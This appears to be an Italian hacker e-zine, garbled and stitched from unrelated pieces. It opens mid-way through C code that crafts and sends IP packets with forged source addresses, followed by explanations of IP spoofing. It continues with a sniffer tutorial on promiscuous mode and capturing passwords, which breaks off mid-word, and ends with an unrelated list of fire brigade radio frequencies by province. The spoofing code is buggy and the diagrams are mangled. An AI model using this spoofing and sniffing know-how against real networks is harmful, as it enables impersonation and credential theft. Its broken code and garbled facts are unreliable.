sizeof(struct sockaddr)); 
if((sp_status < 0) || (sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sSp- 
>ip_optlen)) 


if(sp_status < 0) 
perror("sendto()\n"}), exit(1); 
printf("Trasmessi soltanto %d bytes di %d\n", sp_stat, sp- 
>datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen); 


b; 
} 


Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i 
procedimenti di routine si tenta di risolvere l'host di destinazione, se non si 
riesce si esce (splendido gioco di parole...), se invece l'host esiste si copia nel 
"sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li definite prima con 
#define (TCP 6 e UDP 17), se e' tcp l'header_base sara' ovviamente la lunghezza 
della dimensione minima dell'header tcp(20), se e' udp 

quella dell'udp (8) e se e' altro esce :), l'ip e' 20. Poi si manda il pacchetto 
spoofato realizzato prima, e si vede se il risultato e' positivo o meno, quanti 
bytes sono stati inviati, eccetera. La lunghezza naturalmente e' la lunghezza dei 
dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip (20) + la lunghezza 
delle opzioni ip. 500 righe! Uff! Che fatica... Dovremmo esserci... Per fixare i 
vostri header IP e TCP, ci sono due pratiche(ALLA FACCIA!) funzioni: 


void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo) 


struct ipheader *sp_help_ip; 
int HEADER_BASE; 
switch(protocollo) 


case TCP: HEADER_BASE = TCP_HEADER_BASE; break; 
case UDP: HEADER_BASE = UDP_HEADER_BASE; break; 
case default: exit(1); break; 


} 

sp_help_ip = (struct ipheader *)sp->buffer; 

sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp- 

>tcp_optlen); 

sp_help_ip->tos = 0; 

sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp- 

>tcp_optlen+sp->datalen); 

sp_help_ip->ID = htons(12545); 

sp_help_ip->flageoffset=0; 

sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto... 

sp_help_ip->protocol = protocollo; 

sp_help_ip->source = sp_getaddrbyname(sp->source); 

sp_help_ip->destination = sp_getaddrbyname(sp->destination); 

sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer), 
IP_HEADER_BASE+sp->ip_optlen); 

} 


Questa e' per l'ip... e' molto intuitiva, e' inutile che ve la spieghi. Attenzione, 
la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la spiego brevemente: 
usate un HOSTENT, nel caso in cui l'host debba andare risolto. Se l'host e' gia' 
numerico, si verifica l'esistenza e si ritorna il valore long della medesima. Se 


invece non e' numerico, tentiamo di risolverlo e se ci riusciamo si puo' benissimo 
ritornare il valore long dell'host, altrimenti si da come risultato 0. Per fixare 
l'header TCP: 


void sp_fix_TCP_packet(struct spdataexchange *sp) 


char *pseudo_ip_construct[1500]; 

struct tcpheader *sp_help_tcp; 

struct pseudoipheader *sp_help_pseudo_ip; 

int i; 

for(i=0;i<1500;1++) 
pseudo_ip_construct[i]=0; 


sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen); 
sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct; 


sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) | sp- 
>flags); 

sp_help_tcp->seq = sp->seg; 

sp_help_tcp->ack = sp->ack; 

sp_help_tcp->source = htons(sp->sourceport); 

sp_help_tcp->destination = htons(sp->destinationport); 

sp_help_tcp->window = htons(0x7c00); 


sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source); 
sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination); 
sp_help_pseudo_ip->zero_byte = 0; 

sp_help_pseudo_ip->protocol = TCP; 

sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp- 
>tcp_optlen); 


memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->optlen); 

sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct, 
sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen); 

} 


Ecco qua! Ultimo appunto: la in_cksum e' una funzione che potete trovare 
dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche 
sull'UDP (ma questa e' discriminazione razziale! :)), anche perche', se conoscete 
bene il C (spero, altrimenti che avete fatto, avete letto fin qua senza capire un 


c***0???) e' molto intuitiva da realizzare... Se rimanete nel dubbio, pero', 
leggetevi i sorgenti di spoofit.h, una libreria che mi ha ispirato non poco. Non 
ricordo il nome dell'autore, un attimo... Ah, si: Bretch Claerhout. 


NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li potete 
semplicemente aggiungere queste righe all'inizio del codice :) 


#include <netinet/ip.h> //contiene lo struct per lo header ip 
#include <netinet/tcp.h> //contiene quello per il tcp 
#include <netinet/udp.h> //e quello per l'udp 


ma se ve l'avessi detto prima avreste potuto comprendere come e' formato un header 
ip??? 


I pacchetti IP (il protocollo che si occupa della consegna dei datagrammi) 
possiedono un campo che contiene l'indirizzo sorgente ed uno che contiente 
l'indirizzo di destinazione. Ai fini del routing solo il secondo dei due indirizzi 
ha importanza. E' per questo motivo che in condizioni normali (mancanza di ACL) e' 
possibile spedire dei pacchetti IP che "sembrano" provenire da un qualunque IP. In 
altre parole, in mancanza di un protocollo di livello superiore che autentica la 


sorgente dei pacchetti IP, e' impossibile essere certi del fatto che l'indirizzo 
sorgente appartenga effettivamente all'host che li ha spediti. Immaginate un 
servizio di rete che utilizza il protocollo UDP per eseguire operazioni sul server 
su cui gira, ad esempio lo shutdown della macchina. Questo fantomatico ed insicuro 
protocollo (che e' assolutamente di mia fantasia, ma esempi simili si possono 
trovare in applicazioni reali) aspetta un pacchetto UDP contenente il comando 
"SHUTDOWN" da un particolare indirizzo, ammettiamo 1.2.3.4: tutti i pacchetti 
provenienti da altri indirizzi vengono scartati. Se non fosse possibile praticare 
l'IP spoofing solo l'host 1.2.3.4 sarebbe in grado di eseguire lo shutdown su quel 
server, di fatto invece chiunque puo' spedire un pacchetto come quello mostrato 
sotto. 


| | 
| |1.2.3.4| - |IP SERVER] | 


. « RESTANTE IP HEADER... 


SHUTDOWN 


L'esempio, anche se di pura fantasia, mostra chiaramente che affidarsi ad una 
"trusted-relationship" che si basa sull'indirizzo IP, nel caso di protocolli non 
connessi, non e' affatto una buona idea. Quale sarebbe il modo corretto di 
disegnare il nostro shutdown-protocoll? Una delle possibilita' e' quella di 
cambiare il protocollo in modo che il server, invece di eseguire direttamente il 
comando, aspetti un pacchetto UDP contenente la stringa "AUTH". Se il pacchetto non 
proviene da uno degli IP autorizzati non si cura la della richiesta, alrimenti 
spedisce un pacchetto che contiene un numero pseudo-casuale al client e si mette in 
attesa di un comando. Il client dovra' rispondere con un pacchetto formato dal 
numero casuale che ha ricevuto dal server seguito dal comando, ad esempio "2390- 
SHUTDOWN". Questo protocollo ci salva dall'IP spoofing (nel caso in cui l'attacker 
non e' posto fisicamente tra il server ed il client, altrimenti ha la possibilita' 
di leggere il numero randomico e costruire il pacchetto con il comando), ma devono 
essere prese opportune precauzioni; il generatore dei numeri pseudocasuali deve 
essere "cryptographycally secure", ovvero possedendo una serie di output R1, R2, 
R3, RN, l'attacher non deve essere in grado di predire gli elementi successivi 
della sequenza (la funzione rand(3) della libc non e' un generatore sicuro, e' un 
generatore lineare congruenziale facilmente predicibile). La seconda condizione e' 
che il numero pseudo casuale sia abbastanza grande da non permettere all'attacher 
di montare un attacco di forza bruta in un tempo ragionevole. Come gia' detto, 
questo protocollo ipotizza che l'attacker, anche se non in grado di spedire 
pacchetti provenienti dall'indirizzo (ad esempio) 1.2.3.4, non sia in grado di 
intercettare le risposte che sono dirette all'host 1.2.3.4 (di solito su internet 
questo e' vero, sulle reti locali il discorso e' diverso). E' per questo che solo 
il client che possiede il giusto IP sara' in grado di vedere la risposta spedita 
dal server, contenete il numero pseudo-casuale. 


Con tecniche di IP spoofing si riesce facilmente a falsificare l'indirizzo IP di 
una macchina? 

In altre parole: Se faccio il traceroute dell'indirizzo finto, dovrei comunque 
riuscire a risalire la catena dei router attraversati fino al finto, oppure risalgo 
la catena fino all'IP vero? 

Si fa il traceroute VERO dell'indirizzo FINTO. In teoria, se i vari routers 
avessero un po' di ingegno, non si potrebbe fare neanche spoofing (o quasi). 


In pratica puo' succedere questo: 


A(P) «5 Bussi 


/ 
Prese lossast 


A ti manda un pacchetto fingendosi F. B, che controlla la sottorete A, ed in teoria 
non dovrebbe veder passare pacchetti DA F verso "NON A", invece passa questo strano 
pacchetto "F verso D". Lo stesso fa C, che "dovrebbe" vedere arrivare i pacchetti 
di F solo da E (ma C non puo' sapere se F sia anche collegato o no a B). D si vede 
arrivare un pacchetto da un certo "F" che arriva da "C", di cui si fida e che in 
passato gli ha mandato pacchetti veri di F. 

Un traceroute D-->F rivela: D, C, E, F ... Be A sono rimasti fuori. 

E' possibile naturalmente sapere se F stia originando una connessione con D. A non 
puo' impedirlo. Pero', sapere che quel pacchetto "F->D" e' spoofato non ti fa 
trovare A. 


Se volete maggiori informazioni su l'ip spoofing cercate in rete qualcosa del tipo 
tcpspoof.txt, oppure sequence_attacks.txt o shimomur.txt. 


Nel prossimo numero parleremo di altri tipi di attacchi come l'IP ID attack. 
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Innanzi tutto ringrazio La Zoa crew per aver scritto alcuni paragrafi di questo 
tutoria. Ho deciso di occuparmi degli sniffer dato che non trovavo nessun'altro 
che lo faceva in maniera esaudiente ed anche perche conoscere il 
funzionamenteo di uno snuiffer è sempre utile. 


GLI SNIFFER: 


- cos'e' uno sniffer 

- cos'e' una rete locale 

- protocollo 'Ethernet! 

- cos'e' un pacchetto 

- cosa significa 'promiscuous mode' 

- MAC address: indirizzi IP e physical address 
- differenze tra uno sniffer e un ‘key logger' 

- possibile collocazione di uno sniffer 

- livelli di rischio 

- su quali piattaforme puo' essere installato uno sniffer... 
- ... e dove lo trovo 

- come ti frego lo sniffer! 

- come individuo uno sniffer 

- conclusioni 

- note 

- credits & NO copyright 


- cos'e' uno sniffer? 


Uno sniffer e' un qualsiasi strumento, sia esso un software o un apparato 
hardware, che raccoglie le informazioni che viaggiano lungo una rete 
(network). Questa rete puo' utilizzare un protocollo di comunicazione 
qualunque: Ethernet, TCP/IP (Internet si basa principalmente su questo 
protocollo), IPX o altri. 


Generalmente si utilizzano software sniffer e il termine in questione si riferisce 
a: "The Sniffer Network Analyzer", il nome del primo programma di questo tipo, 
sviluppato dalla Network Associates, Inc. e protetto da trademark. Tuttavia la 
parola 'sniffer' e' ora di uso comune come 'PC' o 'kleenex' e con essa ci 
riferiamo a tutti i programmi che implementano quelle stesse funzioni. 

Si possono dividere i vari tipi di sniffer in due grandi branche: i prodotti 
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commerciali che sono rivolti agli amministratori di rete e alla manutenzione 
interna delle reti stesse e i prodotti sviluppati nell'underground informatico, 
spesso dotati di un'incredibile varieta' di funzioni ulteriori rispetto ai 'tool' 
commerciali; 

entrambi possono essere utilizzati come mezzo per accedere ad una rete. 

Se vogliamo fare una distinzione che non si basi solo sul prezzo del prodotto o 
sulla sua provenienza, possiamo considerare i software precedenti come un 
tutt'uno e rapportarli ad applicativi come gli ‘analizzatori di rete' (network 
analyzer) che danno la possibilita' di fare qualche operazione in piu' rispetto al 
semplice ascolto e archiviazione dei dati di passaggio su una rete, come 
compilare statistiche sul traffico e sulla composizione dei pacchetti. 


Le funzioni tipiche degli sniffer non differiscono di molto e possono essere 
riassunte sinteticamente in: 


* conversione e filtraggio dei dati e dei pacchetti in una forma leggibile 
dall'utente 

* analisi dei difetti di rete, ad es. perche' il computer 'a' non riesce a dialogare 
con 'D' 

* analisi di qualita' e portata della rete (performance analisys), ad es.per 
scoprire 'colli di bottiglia' lungo la rete 

* setacciamento automatizzato di password e nomi di utenti (in chiaro o, piu' 
spesso cifrati) per successiva analisi 

* creazione di 'log', lunghi elenchi che contengono la traccia, in questo caso, 
del traffico sulla rete 

* scoperta di intrusioni in rete attraverso l'analisi dei log del traffico 


Pensate ad una rete come ad un paesaggio dinamico, ad esempio un fiume: in 
esso i pacchetti scorrono liberamente lungo il percorso che offre minor 
resistenza. Uno sniffer e' l'entita' che immerge le mani nel fiume e filtra i 
pacchetti tra le sue dita (facendone una copia senza alterare i pacchetti). 


- cos'e' una rete locale? 


Una rete locale (Local Area Network, LAN) e' un insieme di macchine, di 
computer, interallacciate entro uno spazio fortemente delimitato sia dal punto 
di vista fisico che comunicativo: il numero delle macchine e' (quasi sempre) 
conosciuto ed esse possono comunicare entro canali predefiniti, generalmente 
rappresentati da connessioni ad alta velocita". 

Ethernet e' probabilmente il protocollo piu' conosciuto e utilizzato per gestire 
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una LAN. 
- il protocollo ethernet: 


Nel 1976 Bob Metcalfe e David Boggs, del Palo Alto Research Center (Xerox) 
presentarono alla comunita' informatica un documento intitolato: 'Ethernet: 
distributed packet switching for local computer networks'. 

L'idea sviluppata dai due ricercatori era destinata a rivoluzionare l'infomatica 
commerciale; prima dell'introduzione di ethernet, le reti, soprattutto quelle piu' 
sviluppate erano tutte dipendenti dai mainframe di rete (computer specializzati 
che suddividevano e instradavano le connessioni) e prima ancora si utilizzava 
il metodo del time sharing in cui il mainframe addirittura svolgeva anche 
funzioni di calcolo per il sistema: piu' persone poteva accedere direttamente 
alle risorse attraverso dei limitati terminali. 


Il protocollo ethernet, invece, e' stato sviluppato sul concetto di condivisione: 
tutte le macchine di una rete locale condividono la stessa connessione, lo 
stesso cavo, e l'harware che implementa il protocollo ethernet e' costruito in 
modo da filtrare e ignorare tutto il traffico che non appartiene alla LAN. Questo 
e' possibile perche' ogni hardware ethernet ignora tutti i frame il cui indirizzo 
MAC del destinatario non corrisponde al proprio (o ai propri), impedendo alla 
workstation di accervi. 

Uno sniffer puo' eliminare questo filtro e portare cosi' l'harware ethernet in 
'promiscuous mode', permettendo alla macchina 'A' di 'vedere' tutto il traffico 
che intercorre tra 'B' e 'C', sempre che condividano lo stesso cavo/segmento di 
rete. 


Di seguito saranno esposti i concetti di 'pacchetto', 'promiscuous mode' e 'MAC 
address'. 


- cos'e' un pacchetto? 


Tutto cio' che viene trasferito e lasciato circolare in una rete e' suddiviso e 
'incapsulato' in unita' ben definite chiamate 'pacchetti'; sara' necessaria 
qualche decina di pacchetti per trasferire questo documento al vostro 
computer, ad esempio. Ogni pacchetto viene etichettato con un indirizzo IP e/o 
un indirizzo MAC (di cui discuteremo piu' avanti), che specifica la sua 
destinazione, e ad esso sono associati altri parametri (header) che serviranno 
a instradare e 'riassemblare' i pacchetti, operazione compiuta dalla macchina 
del destinatario. 
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Poiche' tutto il traffico di una rete deve essere ridotto in pacchetti lo sniffer non 
deve far altro che raccogliere tale traffico e analizzarlo sia nella sua forma 
frammentaria che nella sua forma riassemblata, alla ricerca delle informazione 
cui sì mira. 


- cosa significa 'promiscuous mode"? 


Il termine promiscuous mode si riferisce alla modalita' di configurazione 
dell'ethernet adapter' in cui e' permesso a tutte le macchine l'ascolto di tutto il 
traffico di rete, non solo quello proprio. 

Un ethernet adapter, o ethernet card, e' l'hardware che permette l'accesso ad 
una rete tramite questo protocollo; in altre parole, per poter utilizzare un 
computer connesso ad una rete locale come base per uno sniffer, sara' 
necessario dotarsi di un software particolare (un promiscuous driver per 
ethernet card, ad esempio) che permetta la configurazione in promiscuous 
mode. 


Uno sniffer, dunque, non e' altro che un software (o un hardware) che ascolta e 
non ignora i pacchetti che vengono inviati lungo le connessioni, archiviando poi 
le informazioni di passaggio su supporti come dischi rigidi o altro (sulla base 
del volume di traffico che si intende monitorare si potra' optare per la propria 
RAM, veloce ma poco capiente, oppure supporti che concedano piu' spazio, 
come l'HD appunto, purtroppo molto piu' lenti ma che permettono un'analisi dei 
dati da farsi a posteriori con la dovuta calma). 


- MAC address e indirizzi |P: 


Poiche' molte macchine possono condividere una singola connessione 
ethernet, ognuna di esse deve possedere un identificatore (ricordate che, in 
realta', e' la scheda di rete, l'hardware, a possedere un indirizzo, non la 
macchina in se'); questo non succede quando comunichiamo con una 
connessione dial-up utilizzando il nostro modem casalingo, perche' si 
presuppone che tutti i dati che inviamo siano destinati all'entita' che risiede 
all'altro capo della linea (in genere il nostro Internet Service Provider, che ci 
assegnera' un indirizzo IP dinamico). Tuttavia, se comunichiamo attraverso 
una rete ethernet dobbiamo specificare esattamente a quali macchina 
andranno consegnati i pacchetti inviati, anche se la rete fosse composta 
solamente da due computer: ricorderete che il protocollo ethernet fu sviluppato 
per permettere a migliaia di macchine di dialogare fra loro. 
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Cio' e' possibile 'inserendo' un numero esadecimale (cioe' con notazione a 16 
cifre; il MAC address e' composto, invece, da 12 digit) in ogni destinazione 
ethernet ; 

questo numero, in apparenza astruso e' l'indirizzo MAC. 

Eccone un esempio: 00-40-05-A5-4F-9D 


Il MAC address e' composto da 48 bit (8bit = 1byte ; il bit e' l'unita' di misura 
fondamentale dell'informatica). 

Questi 48 bit verranno divisi in due meta': 24 bit identificano il nome del 
produttore della ethernet card, i riamanenti 22 bit identificano il nemero di serie 
UNICO assegnato alla scheda dallo stesso produttore: in questo modo 
l'indirizzo MAC di due ethernet adapter non sara' mai uguale; questo serial 
number e' chiamato OUI (Organizationally Unique Identifier) - e gli ultimi 2 bit ? 


Il protocollo ethernet ci permette anche di comunicare con macchine che non 
risiedono sulla nostra stessa rete ma sono interallacciate alla nostra tramite il 
protocollo TCP/IP (Transport Control Protocol over Internet Protocol, in realta! 
e' un'intera famiglia di protocolli): tuttavia non e' possibile inviare e ricevere i 
dati nella loro forma originale allo stesso modo in cui non e' possibile inviare 
per posta (snail mail) una lettera senza averla imbustata e dotata di francobollo 
e indirizzo del destinatario. 


L'invio dei dati e la loro gestione in rete e' gestita dai diversi protocolli, a partire 
dall'ethernet, cosi' dovremo trattare i nostri dati in modo che i protocolli 
possano 'capire' cosa farne. 


Il compito dello sniffer non sara' solo quello di registrare e archiviare dati ma si 
potra' istruirlo a riconoscere e suddividere i vari header (intestazioni) dei 
pacchetti per tracciare e controllare solo i pacchetti che soddisfino le piu' 
svariate e complesse regole (pattern) che possano interessare chi controlla lo 
sniffer. 


Vediamo cosa succede con una breve spiegazione: 
'A' (alice) possiede un indirizzo IP: 10.0.0.23 (tutti i pacchetti inviati da 'A' 


saranno marcati con questo indirizzo) 
'B' (barbara) possiede invece l'indirizzo IP: 192.168.100.54 
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Per comunicare con 'Barbara', che si trova in una rete diversa, 'Alice' deve 
creare un pacchetto IP che abbia piu' o meno questa forma: [IP packet= 
(10.0.0.23 ===> 192.168.100.54)] 


Questo compito e' svolto dalle applicazioni (dai software) usate da alice per 
spedire i dati lungo la rete e consiste in una operazione d'incapsulazione 
successiva dei dati in un pacchetto che all'esterno' presenta i suoi dati TCP, 

poi quelli IP. Poiche', generalmente, i dati passano da reti ethernet, al 
pacchetto ora descritto saranno aggiunti altri tre strati: il primo e' l'identificativo 
dell'ethertype (comunica all'applicazione TCP/IP della destinazione di 
processare i dati), all'esterno di quest'ultimo sara' visibile il MAC address 
sorgente e infine quello del destinatario (se il destinatario e' inserito in una LAN) 


* MAC add. destinatario 
** MAC add. sorgente 
*** ethertype 


# IP info 
## TCP info 


Solo allora alice inviera' il pacchetto a barbara ed esso attraversera' il primo 
router sulla via per la sua destinazione finale; ogni router che il pacchetto 
incontrera', leggendo la destinazione IP decidera' il corretto cammino dei dati 
verso barbara. 


Dobbiamo pero' tener conto di alcuni fattori: 

alice conosce solamente l'indirizzo IP di barbara e il percorso che fara! il 
pacchetto fino al suo primo router (locale); 

alice non sa nulla della struttura di internet ne' del percorso che il pacchetto 
compira' dopo essere stato processato dal suo router. 


Tutti i router, tranne quello che gestisce l'indirizzo destinatario, possono 
leggere gli indirizzi 
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ethernet ma li ignorano e instradano nuovamente il pacchetto. 
Lo sniffer forza questa regola e copia il pacchetto per archiviarlo sul suo 
supporto di preferenza. 


Ricordiamo che, parlando di sniffer, non ci riferiamo a strumenti che registrano 
l'attivita' che compiamo sulla tastiera del computer o cio' che avviene sul nostro 
schermo. Quest'attivita', compiuta da programmi definiti key logger, equivale a 
leggere cio' che viene battuto sulla tastiera sopra le spalle di chi scrive. Essa 
potra' rivelare ugualmente, forse con minor dispendio di risorse, password o 
altri dati sensibili ma non sara' mai in grado di osservare il traffico che 
intercorre tra due terminali o su un intera rete di macchine. Quest'operazione, e 
la susseguente analisi dei dati raccolti, viene fatta, per l'appunto, attraverso gli 
sniffer. 


Vediamo, dunque, dove e' piu' probabile trovare uno sniffer all'interno di una 
LAN e quali gradi di rischio corre la rete stessa: 


- possibile collocazione di uno sniffer: 


In realta' uno sniffer potrebbe essere installato ovunque sulla rete, tuttavia 
esistono dei punti strategici che, permettendo la raccolta di determinate 
informazioni, sono favoriti rispetto ad altri. Uno di questi e' un qualsiasi punto 
adiacente ad una macchina in cui si puo' presumere passino notevoli quantita' 
di password; ad esempio un gateway di rete oppure un nodo che ospiti traffico 
in entrata e in uscita verso l'esterno della rete stessa. 

Se la LAN e' connessa con l'esterno si puo presumere che lo sniffer cerchera' 
di controllare e copiare le procedure d'utenticazione con le altre reti, cosa che 
permetterebbe di aumentare in via esponenziale le possibilita' invasive di chi 
gestisce lo sniffer. 


Come regola generale, terremo conto del fatto che lo sniffer sara' installato, sia 
esso hardware o software, all'interno dello stesso blocco di rete (net of trust) 
del network che si e' inteso controllare. 

Ovviamente esistono numerose eccezioni che rendono spesso difficile 
individuare i punti esatti in cui cercare uno sniffer all'interno della rete. Questo 
e' ancor piu' vero per alcuni tool, decisamente costosi e non alla portata di tutti 
(chi ha orecchie per intendere, intenda), sviluppati per operare analisi di traffico 
al livello dello stesso cavo di rete (cable sniffer); possono cosi' essere 
impiantati direttamente sulla connessione fisica del network. 
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Gli sniffer (software) sono molto meno subdoli di quel che si pensi, per fortuna, 
e la loro locazione piu' probabile, in una LAN, e', come abbiamo visto, sui 
server che la gestiscono per intero o nei nodi intermedi ma quel che piu' ci 
interessa e' porre l'accento sulla possibilita' che questi prodotti offrono, se usati 
con costanza e cognizione, di ottenere risultati che vanno dall'aquisizione di 
password alla raccolta di dati sensibili, solo per citare alcuni degli obiettivi piu' 
nefasti. 

Sicuramente rappresentano un pericolo per la nostra privacy, intesa nel suo 
senso piu' lato, o possono portare, ad esempio, agli stessi risultati di 
intercettazioni telefoniche e ambientali, a causa, spesso, dell'eccessiva 
sicurezza con cui si pensa di poter disporre del mezzo informatico. 

Torneremo piu' avanti su questi punti; limitiamoci, per ora, ad analizzare i rischi 
dal punto di vista della sicurezza della rete e della sua connessione. 


- livelli di rischio: 


gli sniffer rappresentano un rischio elevato per una rete o per il pc dell'utente 
medio. La semplice esistenza di uno sniffer in rete rappresenta una falla e una 
minaccia alla sicurezza e alla riservatezza delle comunicazioni all'interno della 
rete stessa. 

Se la LAN che utilizzate e' sottoposta al 'controllo' di uno sniffer ci sono due 
possibilita': un intruso, dall'esterno, e' riuscito ad entrare all'interno della rete e 
installare lo sniffer, oppure un utente o il gestore della rete stessa sta' 
combinando qualcosa che potrebbe andare ben oltre la manutenzione e il 
monitoraggio delle connessioni. In ogni caso la vostra privacy, o peggio la 
sicurezza stessa di tutte le comunicazioni, e' compromessa. 


Prendiamo come esempio la situazione che potrebbe interessare l'utente 
medio durante l'utilizzo delle reti universitarie: 

se le connessioni utilizzate per accedere a internet o le connessioni, poniamo, 
dal pc al server dell'aula informatica, abitualmente usata dagli studenti, e' 
monitorata da uno sniffer, qualsiasi dato sensibile in passaggio sulla LAN 
controllata e' a rischio d'intercettazione e successiva archiviazione (e magari 
utilizzo). 


In base alla quantita' di traffico prodotto e alla quantita' di traffico raccolta dallo 
sniffer (abbiamo visto come cio' dipenda dalle scelte di chi installa lo sniffer e in 
base alla 'memoria' disponibile) possiamo stabilire che i dati maggiormente a 
rischio sono proprio le password personali utilizzate per accedere ai piu' 
svariati servizi di rete (login utente, accesso al proprio spazio su disco) o 
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servizi internet (la vostra mail-box!), poiche' la richiesta d'accesso e, quindi, di 
invio della password rientra nei primi pacchetti che vengono inviati per ogni 
tentativo di connessione al servizio prescelto dall'utente ed e' il primo dato che 
viene filtrato dallo sniffer. 

Generalmente, poi, i servizi in rete o web utilizzano protocolli d'utenticazione 
del tutto in chiaro (non cifrati). 


Dal punto di vista dell'analista di sicurezza lo sniffing e' un attacco di secondo 
livello. L'intruso si e' gia' introdotto nella rete e ora cerca di compromettere 
maggiormente la sicurezza del sistema. 


Comunque, cio' che puo' essere raccolto dallo sniffer, non e' rappresentato 
solamente dagli elenchi degli utenti o le password d'accesso ai servizi ma puo' 
contenere dati che spaziano dal numero della (onnipresente) carta di credito 
ad altri dati finanziari, fino al testo del messaggio spedito via e-mail. 


Come si diceva prima,pero', e' improbabile che uno sniffer sia dotato di 
supporti che gli permettano di catturare tutto il traffico in passaggio su un dato 
network; in piu' all'aumentare del traffico in una rete aumentano anche i 
pacchetti che saranno persi: dai rapporti tecnici relativi agli sniffer e' emerso 
che, in network dotati di connessioni ad alta velocita' e con volumi di traffico 
elevati, una parte considerevole dei dati sfugge alla cattura dello sniffer. 
D'altro canto cio' non significa che una rete piu' grande fornisca, di per se', una 
maggiore sicurezza ai suoi utenti. 


- sistemi operat 
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PUBBLICO SOCCORSO — VV.FF. 


BANDA 73-74MHz 


LINK MASTER UHF - LIMITI DI BANDA 434-435 444-445 MHz 


PER OGNI PROVINCIA VENGONO RIPORTATI I DISTACCAMENTI DIPENDENTI 


PROVINCIE E LOCALITA’ 


Agrigento 

Canicatti (contrada Ponte Bonavia) 
Lampedusa 

Licata 

Santa Margherita di Belice 

Sciacca 


Alessandria 
Acqui Terme 
Casale Monferrato 
Novi Ligure 
Ovada 

Tortona 


Ancona 

Ancona (nautica) 

Fabriano 

Falconara Marittima (località aeroporto) 
Jesi 

Osimo 

Senigallia 


Aosta 
Courmayeur 
Pont Saint Martin 


Arezzo 

Arezzo (Nucleo Elicotteri) 
Bibbiena 

Cortona (località Tavarnelle) 
Montevarchi 

Pratovecchio 

San Sepolcro 


Ascoli Piceno 
Fermo 
San Benedetto del Tronto 


Asti 
Nizza Monferrato 


Avellino 

Bisaccia 

Grottaminarda 

Lioni (contrada Macchione) 
Montella 


Bari 

Bari (aeroporto Palese) 
Bari (Nucleo Elicotteri) 
Bari (nautica) 


FREQUENZE 


73.500 73.600 


73.625 73.850 


73.550<>73.575 (simulcast) 73.600 


73.525 73.800 73.950 


73.650 73.775 73.850 73.900 


73.600 73.650<>73.875 (simulcast) 73.775 


73.625 


73.525 


73.550<> 73.600 (simulcast) 73.700 73.800 


Altamura 
Barletta 
Putignano 


Belluno 

Agordo 

Colle Santa Lucia 
Cortina d’ Ampezzo 
Feltre 

Longarone 

Piave di Cadore 

Santo Stefano di Cadore 
Selva di Cadore 


Benevento 

Bonea 

Castelvenere 

San Marco Dei Cavoti 


Bergamo 

Clusone 

Gazzaniga 

Lovere 

Orlo al Serio (località aeroporto) 
Romano di Lombardia 

Treviglio 

Zogno 


Biella 
Trivero (frazione Ponzone) 


Bologna 

Bologna (aeroporto Borgo Panigale) 
Bologna (Nucleo Elicotteri) 

Budrio 

Casalecchio di Reno 

Casteì San Pietro Terme (volontari) 
Castiglione dei Pepoli (volontari) 
Imola 

Medicina (volontari) 

Porretta Terme (volontari) 

San Giovanni in Persiceto (volontari) 
San Pietro in Casale (volontari) 


Bolzano 

Bressanone (frazione Albes) 
Brunico 

Chienes 

Comedo all’ Isarco 

Corvara in Badia 

Laives (località San Giacomo) 
Malles Venosta 

Merano 

Ortisei (volontari) 

Predonico (volontari) 

San Candido 

Selva Val Gardena (volontari) 
Senale-San Felice 

Silandro (frazione Vezzano) (volontari) 
Villa Santa Caterina (volontari) 
Vipiteno (volontari) 


73.525 73.650 73.825 73.875 


non disponibili 


73.500 73.700<>73.925 (simulcast) 


73.575<>73.725<>73.750<>74.067,5 (simulcast) 


73.550 73.575 73.650 73.950 


73.600 73.700 


SONO RIPORTATI I PRINCIPALI DISTACCAMENTI 
OPERANTI NELLA PROVINCIA 


Brescia 

Brano 

Chiari 

Darfo-Boario Terme 
Edolo 

Orzinuovi 

Salò 

Verolanuova 


Brindisi 

Brindisi (aeroporto Casale) 
Brindisi (nautica) 
Francavilla Fontana 

Ostuni 


Cagliari 

Cagliari (aeroporto Elmas) 
Cagliari (nautica) 
Carbonia 

Iglesias 

Sanluri 


Caltanissetta 
Gela 
Mussomeli 


Campobasso 
Termoli (contrada Pantano Basso) 


Caserta 
Aversa 
Teano 


Catania 

Catania (aeroporto Fontanarossa) 
Catania (Nucleo Elicotteri) 
Catania (nautica) 

Acireale 

Adrano 

Caltagirone 

Mascali 

Paternò 


Catanzaro 


Chiaravalle Centrale (contrada Foresta) 
Lamezia Terme (aeroporto SantEutemia Lamezio) 


Chieti 
Casoli 
Lanciano 
Ortona 


San Giovanni Teatino (località aeroporto) 


Vasto 


Como 

Appiano Gentile 

Cantù 

Canzo 

Dongo (presso stabilimento Falck) 
Erba 

Lomazzo 


73.500 73.525 73.750 


73.550<>73.600 (simulcast) 73.950 


73.750 


73.575 73.600 


73.525 


73.625 


73.550 73.800 


73.550 73.700 


73.625 73.750 


73.500 73.600 


Cosenza 
Castrovillari 
Corigliano Calabro 
Paola 

Rossano 

Scalea 


Cremona 
Crema 


Crotone 
Cirò Marina 


Isola Capo Rizzuto (località aeroporto) 


Cuneo 

Alba 

Barge 

Brà 

Ceva 

Cortemilia 

Fossano 

Geressio (volontari) 
Mondovi Breo 
Racconigi 

Saluzzo 

Santo Stefano Belbo 
Santo Stefano Roero 
Savigliano 


Enna 
Nicosia 


Piazza Armerina (contrada Bellia) 


Ferrara 
